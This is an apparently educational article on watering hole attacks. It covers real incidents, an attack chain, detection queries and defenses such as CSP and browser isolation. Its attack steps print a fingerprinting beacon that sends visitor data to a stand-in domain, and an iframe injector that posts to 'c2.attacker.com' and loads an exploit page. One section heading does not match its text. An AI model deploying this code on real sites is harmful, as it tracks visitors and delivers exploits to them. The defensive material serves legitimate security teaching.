In February 2017, a bank’s security team was reviewing the JavaScript source code of the Polish Financial Supervision Authority (KNF) website — a regulatory portal they were required to visit regularly. They found something unexpected: an obfuscated JavaScript snippet that fingerprinted visitors and selectively redirected specific targets to an exploit kit landing page. The KNF site had been compromised. The attackers had turned the regulator’s own website into a trap for the banks it supervised.

This is the defining characteristic of a watering hole attack: the victim comes to the attacker’s malware willingly, on a trusted site, via a routine business task. No phishing email. No suspicious link. No social engineering of the target — only of the third-party site they trust.


Attack Concept and Strategic Logic

Spearphishing targets the individual. Watering hole attacks target the site the individual visits.

The strategic logic is compelling for attackers:

  • High-value targets often have strong email filtering and security-aware employees trained to recognize phishing.
  • But those same employees visit industry sites, regulatory portals, tool vendor documentation, and community forums as a legitimate part of their work.
  • A compromised industry site may reach hundreds of employees across dozens of target organizations simultaneously.
  • The attack infrastructure is hosted on a domain with legitimate reputation history, bypassing URL reputation and web categorization blocks.

The term “watering hole” is an analogy to predator-prey ecology: rather than chasing prey across an open plain (directly targeting the victim), the predator positions itself at the water source and waits.


Real Incidents

Operation Aurora (2009–2010)

Operation Aurora targeted at least 34 companies including Google, Adobe, Juniper Networks, and Rackspace. The attack, attributed to APT17 (China), involved zero-day exploitation of Internet Explorer (CVE-2010-0249) delivered through a watering hole on a compromised website.

The JavaScript exploit triggered when target employees visited the infected page and used the vulnerable IE version. The payload granted persistent access and was used to exfiltrate intellectual property and access Google’s source code repository. Google disclosed the breach publicly in January 2010, attributing it to China — a rare and consequential disclosure at the time.

CVE-2010-0249 — Internet Explorer use-after-free vulnerability in the HTML object element. CVSS 9.3. Exploited as a zero-day by APT17.

Polish Financial Supervision Authority (2017)

In early 2017, threat actors (tentatively linked to the Lazarus Group based on code overlaps) compromised the KNF website and injected a JavaScript snippet that:

  1. Collected browser metadata from every visitor.
  2. Selectively redirected specific visitors (identified by IP range and browser fingerprint corresponding to target banks) to an exploit kit.
  3. Deployed banking malware to compromise the internal networks of Polish financial institutions.

The selective targeting — affecting only a subset of visitors — made the injection harder to detect via casual site review.

Holy Water Campaign (2019–2020)

Documented by Kaspersky in 2020, the Holy Water campaign targeted religious and political figures associated with a South Asian religious minority. The attackers compromised multiple websites serving this community and used a two-stage delivery:

  1. A JavaScript beacon profiled visitors.
  2. Visitors matching the target profile were redirected to a fake Adobe Flash updater that installed the GODLIKE12 backdoor.

The campaign ran undetected for approximately a year.

US Defense Contractor Sites (2021) — Attribution: Lazarus Group

In early 2021, Google Project Zero and TAG documented a campaign where North Korean threat actors (Lazarus) compromised multiple websites serving the security research community. The sites delivered a zero-day Chrome exploit (not fully detailed at time of disclosure) to security researchers — a high-value target for a nation-state interested in understanding defensive tools and vulnerabilities held by researchers.


Technical Attack Chain

Step 1: Target Profiling and Site Selection

Attackers identify candidate watering holes using:

  • Web analytics reconnaissance: Sites can embed tracking pixels or use ad networks that surface audience demographic data.
  • OSINT: Industry associations, regulatory bodies, trade publications, niche forums, conference sites.
  • Social media: LinkedIn profiles of target employees often reveal what professional communities and sites they frequent.

The ideal candidate site has:

  • A high-value, targeted audience (security researchers, financial executives, defense contractors).
  • Weak security posture (outdated CMS, no WAF, minimal security team).
  • Legitimate SSL certificate and domain reputation.

Step 2: Site Compromise

Common compromise methods:

- CMS vulnerability exploitation (WordPress plugin CVEs, Drupal SA advisories)
- Credential stuffing against site admin panels
- SQL injection to gain database access and escalate to OS shell
- Compromising the hosting provider or web developer
- Supply chain via third-party JavaScript libraries included by the target site

Step 3: Victim Fingerprinting JavaScript Beacon

Once site access is gained, the attacker injects a JavaScript fingerprinting beacon. The beacon profiles visitors and sends metadata to the attacker’s infrastructure. Only visitors matching the target profile receive the exploit payload — this selective delivery is a signature of sophisticated watering hole campaigns.

 1// Victim fingerprinting beacon — representative example of techniques
 2// used in documented watering hole campaigns (Holy Water, Polish KNF, etc.)
 3// For educational and detection purposes.
 4
 5(function() {
 6    'use strict';
 7
 8    var beacon = {};
 9
10    // Collect browser and system information
11    beacon.ua = navigator.userAgent;
12    beacon.lang = navigator.language || navigator.userLanguage;
13    beacon.platform = navigator.platform;
14    beacon.cookieEnabled = navigator.cookieEnabled;
15    beacon.doNotTrack = navigator.doNotTrack;
16    beacon.screenWidth = screen.width;
17    beacon.screenHeight = screen.height;
18    beacon.colorDepth = screen.colorDepth;
19    beacon.timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
20    beacon.timezoneOffset = new Date().getTimezoneOffset();
21
22    // Plugin enumeration (reduced in modern browsers but still useful)
23    var plugins = [];
24    for (var i = 0; i < navigator.plugins.length; i++) {
25        plugins.push(navigator.plugins[i].name);
26    }
27    beacon.plugins = plugins.join(',');
28
29    // Canvas fingerprinting
30    var canvas = document.createElement('canvas');
31    var ctx = canvas.getContext('2d');
32    ctx.textBaseline = 'top';
33    ctx.font = '14px Arial';
34    ctx.fillText('fingerprint', 2, 2);
35    beacon.canvasFP = canvas.toDataURL().slice(-50);
36
37    // Network information (if available)
38    if (navigator.connection) {
39        beacon.effectiveType = navigator.connection.effectiveType;
40        beacon.downlink = navigator.connection.downlink;
41    }
42
43    // Encode and exfiltrate to C2
44    var encoded = btoa(JSON.stringify(beacon));
45
46    // Delivery via image pixel (bypasses some CSP script-src rules)
47    var img = new Image();
48    img.src = 'https://analytics.legitimate-looking-domain.com/px?' +
49              'v=' + encoded +
50              '&r=' + encodeURIComponent(document.referrer) +
51              '&t=' + Date.now();
52
53    // If target matches criteria: inject iframe with exploit
54    // Criteria checked server-side based on IP, UA, and fingerprint data
55    // Server responds with 302 redirect or a 1x1 pixel containing exploit trigger
56})();

Step 4: iframe Injection for Exploit Delivery

For profiled visitors who match the target criteria, the C2 server returns JavaScript that injects a hidden iframe pointing to the exploit landing page:

 1// Iframe injection — delivers exploit kit to profiled targets
 2// The iframe is hidden (0px) to avoid visual detection
 3
 4function injectExploitFrame(exploitUrl) {
 5    var iframe = document.createElement('iframe');
 6    iframe.setAttribute('src', exploitUrl);
 7    iframe.setAttribute('width', '0');
 8    iframe.setAttribute('height', '0');
 9    iframe.setAttribute('style', 'display:none;border:0;margin:0;padding:0;');
10    iframe.setAttribute('sandbox', '');  // Removed in actual attacks; shown here for detection
11    document.body.appendChild(iframe);
12}
13
14// C2 callback evaluates fingerprint and returns exploit URL for matching targets
15fetch('https://c2.attacker.com/check', {
16    method: 'POST',
17    body: JSON.stringify(beacon),
18    headers: {'Content-Type': 'application/json'}
19})
20.then(r => r.json())
21.then(data => {
22    if (data.target === true) {
23        injectExploitFrame(data.exploitUrl);
24    }
25});

Step 5: Drive-By Exploit Execution

The exploit landing page delivers browser exploits targeting:

  • JavaScript engine vulnerabilities: V8 (Chrome), SpiderMonkey (Firefox), JavaScriptCore (Safari).
  • Browser renderer bugs: Use-after-free, type confusion, out-of-bounds write in HTML/CSS parsing.
  • Plugin vulnerabilities: Adobe Reader (PDF rendering), Java applets (legacy), Flash (end-of-life).

Example CVEs used in documented watering hole campaigns:

CVEBrowser/ComponentUsed In
CVE-2010-0249Internet ExplorerOperation Aurora
CVE-2016-7255Windows kernel (privilege escalation)Operation Strontium
CVE-2019-5786Chrome FileReader UAFVarious APT campaigns
CVE-2021-1879WebKit (iOS Safari)iOS watering hole (FORCEDENTRY precursor)
CVE-2022-0609Chrome AnimationNorth Korean watering hole (TAG disclosure)

Detection

Proxy Log Analysis for Suspicious JavaScript Sources

 1# Extract unique JavaScript source domains from proxy logs
 2# (Squid, Bluecoat, Zscaler, etc.)
 3
 4# Squid log format: timestamp elapsed client request_status/code bytes method URL
 5awk '{print $7}' /var/log/squid/access.log |
 6    grep -E "\.(js|mjs)(\?|$)" |
 7    sed 's|https\?://||; s|/.*||' |
 8    sort | uniq -c | sort -rn |
 9    head -50
10
11# Flag: JS loaded from domains not in your approved CDN/vendor list
12# Especially watch for: newly registered domains, IDN homoglyph domains,
13# domains that are slight misspellings of known CDNs

Splunk SPL — Detect JavaScript loaded from suspicious external domains:

index=proxy
| rex field=url "https?://(?P<domain>[^/]+)"
| where isnotnull(domain)
| rex field=url "\.(?P<ext>[a-z]{2,5})(\?|$)"
| where ext="js"
| where NOT match(domain, "(?i)(jquery|cloudflare|googleapis|akamai|cdn|bootstrapcdn|microsoft|google\.com)$")
| stats count by domain, src_ip
| where count > 5
| sort - count

Threat Intelligence Feed Integration

 1import requests
 2import json
 3
 4# Query OpenPhish / URLhaus for known malicious URLs
 5# Check if any URLs in proxy logs match current watering hole IOCs
 6
 7def check_urlhaus(url):
 8    api_endpoint = "https://urlhaus-api.abuse.ch/v1/url/"
 9    payload = {"url": url}
10    r = requests.post(api_endpoint, data=payload, timeout=10)
11    return r.json()
12
13# Example — check URLs from proxy log
14suspicious_urls = [
15    "http://compromised-site.example.com/analytics.js",
16    "http://conference-portal.example.org/track.js"
17]
18
19for url in suspicious_urls:
20    result = check_urlhaus(url)
21    if result.get("query_status") == "is_available":
22        print(f"MALICIOUS: {url} | Tags: {result.get('tags', [])}")
23    else:
24        print(f"Clean (not in URLhaus): {url}")

Browser Telemetry and EDR Correlation

Modern EDRs with browser telemetry can log:

  • Every URL visited by browser processes.
  • JavaScript execution context (which origin executed which script).
  • Network connections initiated by browser child processes.
  • Process injection attempts from browser sandbox escape exploits.

Key indicators to alert on:

- Browser process (chrome.exe, firefox.exe) spawning a child process (cmd.exe, powershell.exe, wscript.exe)
- Browser process making outbound connections to non-browsed IPs
- DLL injection into browser process from an unsigned DLL
- Browser process creating files in %TEMP%, %APPDATA%, or %STARTUP%

Sysmon/Splunk — Browser spawning shell:

index=sysmon EventCode=1
| where ParentImage match "(?i)(chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe|safari\.exe)"
| where Image match "(?i)(cmd\.exe|powershell\.exe|wscript\.exe|mshta\.exe|cscript\.exe)"
| table _time, host, user, ParentImage, Image, CommandLine
| sort - _time

Defense and Mitigation

1. Browser Isolation (Remote Browser Isolation — RBI)

RBI is the most complete technical control. All browsing of external/uncategorized sites occurs in a disposable container. The endpoint receives only a pixel stream — no code executes locally.

Deploy for:

  • All browsing of internet sites by high-risk user populations (executives, finance, IT).
  • Access to all uncategorized or newly-registered domains.
  • Access to third-party portals required for business (regulatory sites, vendor portals).

2. Content Security Policy (CSP) — Protect Your Own Site

You cannot add CSP headers to third-party sites. But you can protect your own site from being used as a watering hole:

 1# Nginx — enforce strict CSP to prevent script injection
 2add_header Content-Security-Policy "
 3    default-src 'self';
 4    script-src 'self' 'nonce-{RANDOM_NONCE}' https://cdn.trusted-vendor.com;
 5    style-src 'self' 'unsafe-inline' https://fonts.googleapis.com;
 6    img-src 'self' data: https:;
 7    font-src 'self' https://fonts.gstatic.com;
 8    object-src 'none';
 9    base-uri 'self';
10    frame-ancestors 'none';
11    form-action 'self';
12    upgrade-insecure-requests;
13" always;
14
15# Also add these security headers
16add_header X-Frame-Options "DENY" always;
17add_header X-Content-Type-Options "nosniff" always;
18add_header Referrer-Policy "strict-origin-when-cross-origin" always;

Subresource Integrity (SRI) — prevent CDN-based injection:

1<!-- SRI ensures the CDN-served script matches the expected hash -->
2<!-- If a CDN is compromised (third-party supply chain attack), the browser rejects the tampered file -->
3<script
4    src="https://cdn.jsdelivr.net/npm/jquery@3.7.1/dist/jquery.min.js"
5    integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
6    crossorigin="anonymous">
7</script>

3. DNS Filtering and Web Categorization

Deploy DNS-layer filtering (Cisco Umbrella, Cloudflare Gateway, Zscaler) to:

  • Block newly registered domains (high risk of being attacker-controlled infrastructure).
  • Block uncategorized domains.
  • Enable SafeSearch enforcement.
  • Alert on DNS queries to domains with low Alexa/Tranco rank that don’t match expected traffic patterns.
 1# Blocked DNS categories to consider (Umbrella-style categorization):
 2# - Newly Seen Domains (less than 30 days old)
 3# - Dynamic DNS
 4# - Parked Domains
 5# - Malware / Command and Control
 6# - Cryptomining
 7
 8# Using Pi-hole or similar for on-premises DNS filtering:
 9# Add threat intel blocklists
10pihole -b newly-registered-domains.malware-filter.txt

4. Browser Hardening and Update Cadence

Browser exploit chains targeting zero-days require an unpatched browser. Aggressive patch cadence is the single most impactful control:

1# Check Chrome version across fleet via WMI/SCCM
2Get-WmiObject -Class Win32_Product |
3    Where-Object { $_.Name -match "Google Chrome" } |
4    Select-Object Name, Version, InstallDate
5
6# Force Chrome update via registry (managed devices)
7reg add "HKLM\SOFTWARE\Policies\Google\Update" /v AutoUpdateCheckPeriodMinutes /t REG_DWORD /d 60 /f
8reg add "HKLM\SOFTWARE\Policies\Google\Update" /v UpdateDefault /t REG_DWORD /d 1 /f

Browser security settings to enforce via policy:

  • Disable Java, Flash, and other legacy plugins.
  • Enable strict site isolation (--site-per-process in Chromium-based browsers).
  • Enable Enhanced Protection mode in Chrome Safe Browsing.
  • Disable extension installation from outside the corporate extension store.
  • Enable JIT hardening where available.

5. Third-Party Site Risk Assessment

For external sites that business operations require regular access to (regulatory portals, vendor sites, industry forums):

  • Subscribe to site change monitoring services to detect JavaScript modifications.
  • Use browser developer tools to audit which external scripts each required site loads.
  • Report anomalies to site owners promptly — the Polish KNF incident was discovered by a diligent bank security team.
 1# Monitor third-party site JavaScript for changes using curl + diff
 2curl -s https://required-vendor-portal.com/static/app.js | sha256sum > baseline_hash.txt
 3
 4# Run daily — alert on hash change
 5NEW_HASH=$(curl -s https://required-vendor-portal.com/static/app.js | sha256sum)
 6BASELINE=$(cat baseline_hash.txt)
 7if [ "$NEW_HASH" != "$BASELINE" ]; then
 8    echo "ALERT: JavaScript hash changed on required-vendor-portal.com"
 9    # Send alert to SOC
10fi


References